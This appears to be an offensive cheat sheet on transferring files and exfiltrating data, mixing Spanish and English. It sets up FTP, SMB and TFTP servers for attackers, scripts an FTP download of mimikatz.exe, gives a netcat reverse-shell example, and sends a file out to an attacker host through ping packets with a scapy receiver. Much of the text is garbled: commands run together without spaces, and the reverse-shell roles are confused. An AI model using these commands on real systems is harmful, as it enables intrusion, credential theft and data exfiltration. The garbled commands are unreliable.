#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Cliente Windows
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
SMB
Kali como servidor
kali_op1>impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2>smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
O crear un recurso compartido smb utilizando samba:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
Windows
Exfiltration
Exfiltration is the unauthorized transfer of data from a target system. Attackers use various techniques to exfiltrate data, such as:
Compression: Attackers compress data before exfiltrating it to reduce its size and avoid detection.
Encryption: Data is encrypted to prevent unauthorized access during exfiltration.
Steganography: Attackers hide data within other files to avoid detection.
Exfiltration over Alternative Protocols: Attackers use protocols like DNS or ICMP to exfiltrate data, bypassing traditional security controls.
Exfiltration over Command and Control Channels: Attackers use existing command and control channels to exfiltrate data, making it harder to detect.
To prevent exfiltration, organizations can implement measures such as:
Network Segmentation: Segregating networks to limit the movement of attackers within the network.
Data Loss Prevention (DLP) Solutions: Monitoring and preventing unauthorized data transfers.
Network Traffic Analysis: Monitoring network traffic for signs of exfiltration attempts.
User Training: Educating users about the risks of data exfiltration and how to recognize and report suspicious activities.
By understanding exfiltration techniques and implementing appropriate security measures, organizations can better protect their data from unauthorized access and leakage.
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind>netusez: \\10.10.14.14\test/user:testtest#For SMB using credentialsWindPS-1>New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\10.10.14.9\kali"WindPS-2>cdnew_disk:
The nc command, also known as Netcat, is a versatile networking tool that can be used for various purposes during a penetration test. It can be used for port scanning, banner grabbing, transferring files, and establishing reverse shells. Netcat operates by establishing a connection between a client and a server, allowing for data transfer between the two.
Usage
To establish a connection with a remote server using nc, you can use the following command:
nc<remote_server_ip><port>
To listen for incoming connections on a specific port, you can use the following command:
nc-l-p<port>
Example
Establishing a reverse shell using nc:
Attacker machine: nc -l -p 1234 -e /bin/bash
Victim machine: nc <attacker_ip> 1234
This will establish a reverse shell from the victim machine to the attacker machine, allowing the attacker to execute commands on the victim's system.
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)
SMTP
Si puedes enviar datos a un servidor SMTP, puedes crear un servidor SMTP para recibir los datos con python:
sudopython-msmtpd-n-cDebuggingServer:25
TFTP
Por defecto en XP y 2003 (en otros sistemas operativos necesita ser agregado explícitamente durante la instalación)
En Kali, iniciar el servidor TFTP:
#I didn't get this options working and I prefer the python optionmkdir/tftpatftpd--daemon--port69/tftpcp/path/tp/nc.exe/tftp
Visual Basic Scripting Edition (VBScript) is a scripting language developed by Microsoft. It is commonly used for writing scripts to automate tasks on Windows operating systems. VBScript can be used for exfiltration by reading data from files, registry keys, or other sources and sending it to an external server.
Exfiltration Techniques
1. File Transfer
VBScript can be used to read the contents of a file and send it to an external server using HTTP or other protocols.
To detect and prevent exfiltration using VBScript, monitoring network traffic for suspicious outbound connections, restricting VBScript execution in enterprise environments, and implementing endpoint security solutions can be effective measures.
El programa debug.exe no solo permite la inspección de binarios, sino que también tiene la capacidad de reconstruirlos a partir de hexadecimal. Esto significa que al proporcionar un hexadecimal de un binario, debug.exe puede generar el archivo binario. Sin embargo, es importante tener en cuenta que debug.exe tiene una limitación de ensamblar archivos de hasta 64 kb de tamaño.
# Reduce the sizeupx-9nc.exewineexe2bat.exenc.exenc.txt
Luego copia y pega el texto en la ventana de comandos de Windows y se creará un archivo llamado nc.exe.